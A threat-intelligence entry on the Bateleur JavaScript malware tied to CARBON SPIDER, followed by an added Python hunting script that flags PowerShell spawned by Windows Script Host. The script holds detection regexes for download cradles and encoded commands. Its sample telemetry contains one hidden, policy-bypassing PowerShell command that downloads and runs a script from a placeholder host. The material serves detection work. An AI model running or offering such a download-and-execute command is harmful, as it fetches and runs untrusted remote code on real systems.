
Bateleur (81faf0c1-0595-436b-a66a-05d8b435bccd)

Bateleur deployments began not long after JS Flash and were also written in JavaScript. Deployments were less frequent, and no testing phase was observed. Bateleur was likely run in parallel as an alternative tool and eventually replaced JS Flash as CARBON SPIDER’s first-stage tool of choice. Although much simpler in design than JS Flash, executing entirely from a single script with more basic obfuscation, Bateleur has a wealth of capabilities, including the ability to download arbitrary scripts and executables, deploy TinyMet, execute commands via PowerShell, deploy a credential stealer, and collect victim system information such as screenshots.
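A first stage written in JavaScript that downloads payloads and runs commands through PowerShell leaves a recognisable process lineage. The following is an added hunting example, not code from this page, from CrowdStrike or from the MISP galaxy project. It assumes the script is executed by Windows Script Host (wscript.exe or cscript.exe) and that process-creation telemetry with parent image, image and command line is available (Sysmon Event ID 1 or similar); the tab-separated record format and the four sample events are constructed for the example. Neither the host process nor the exact command lines are stated on the page.

```python
"""Hunt for PowerShell launched by a script host with download / encoded-command traits.

Added example (assumptions: Windows Script Host as the JS runtime, Sysmon-like
process-creation telemetry, constructed tab-separated records). Not Bateleur code.
"""
import re
from dataclasses import dataclass

SCRIPT_HOSTS = {"wscript.exe", "cscript.exe"}
POWERSHELL = {"powershell.exe", "pwsh.exe"}

# Command-line traits that raise the priority of a script-host -> PowerShell spawn.
SUSPICIOUS_ARGS = {
    "encoded_command": re.compile(r"(?i)(?:^|\s)-(?:e|ec|enc|encodedcommand)\s"),
    "download": re.compile(r"(?i)downloadstring|downloadfile|invoke-webrequest|net\.webclient"),
    "hidden_window": re.compile(r"(?i)-w(?:indowstyle)?\s+hidden"),
    "bypass": re.compile(r"(?i)-(?:ep|executionpolicy)\s+bypass"),
}


@dataclass
class ProcEvent:
    event_id: int
    parent_image: str
    image: str
    command_line: str


def parse_event(line: str) -> ProcEvent:
    """Parse one constructed record: id<TAB>ParentImage<TAB>Image<TAB>CommandLine."""
    event_id, parent, image, cmd = line.rstrip("\n").split("\t", 3)
    return ProcEvent(int(event_id), parent, image, cmd)


def basename(path: str) -> str:
    """Lower-cased file name of a Windows or POSIX path."""
    return path.replace("/", "\\").rsplit("\\", 1)[-1].lower()


def classify(ev: ProcEvent) -> list[str]:
    """Return the reasons an event is flagged; an empty list means not flagged.

    The lineage check (script host parent, PowerShell child) is the gate;
    command-line traits are appended as context for triage.
    """
    if basename(ev.parent_image) not in SCRIPT_HOSTS or basename(ev.image) not in POWERSHELL:
        return []
    reasons = ["powershell_from_script_host"]
    reasons += [name for name, rx in SUSPICIOUS_ARGS.items() if rx.search(ev.command_line)]
    return reasons


def hunt(lines) -> dict[int, list[str]]:
    """Map event id -> reasons for every flagged record in the input."""
    hits: dict[int, list[str]] = {}
    for line in lines:
        if not line.strip():
            continue
        ev = parse_event(line)
        reasons = classify(ev)
        if reasons:
            hits[ev.event_id] = reasons
    return hits


PS = "C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\powershell.exe"

# Constructed sample telemetry; event 1 and 3 are the ones a hunter should see.
SAMPLE_EVENTS = [
    "\t".join(["1", "C:\\Windows\\System32\\wscript.exe", PS,
               "powershell.exe -w hidden -ep bypass -c \"IEX (New-Object Net.WebClient)"
               ".DownloadString('http://example.invalid/a.ps1')\""]),
    "\t".join(["2", "C:\\Windows\\explorer.exe", PS, "powershell.exe Get-Process"]),
    "\t".join(["3", "C:\\Windows\\System32\\cscript.exe", PS,
               "powershell.exe -EncodedCommand SQBFAFgA"]),
    "\t".join(["4", "C:\\Windows\\System32\\wscript.exe", "C:\\Windows\\System32\\cmd.exe",
               "cmd.exe /c echo hi"]),
]

if __name__ == "__main__":
    for eid, reasons in hunt(SAMPLE_EVENTS).items():
        print(eid, ", ".join(reasons))
```

The lineage gate keeps the rule narrow: a PowerShell process started by Explorer with a download cmdlet (event 2 without it, but a common admin pattern) is not flagged, and a script host spawning cmd.exe (event 4) is left to a separate rule. Legitimate logon scripts do occasionally launch PowerShell from wscript.exe, so in production the command-line reasons, not the lineage alone, should drive alert severity.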

Related clusters
Cluster A: Bateleur (81faf0c1-0595-436b-a66a-05d8b435bccd), Galaxy A: Tool
Cluster B: Bateleur (fb75a753-24ba-4b58-b7ed-2e39b0c68c65), Galaxy B: Malpedia
Level: 1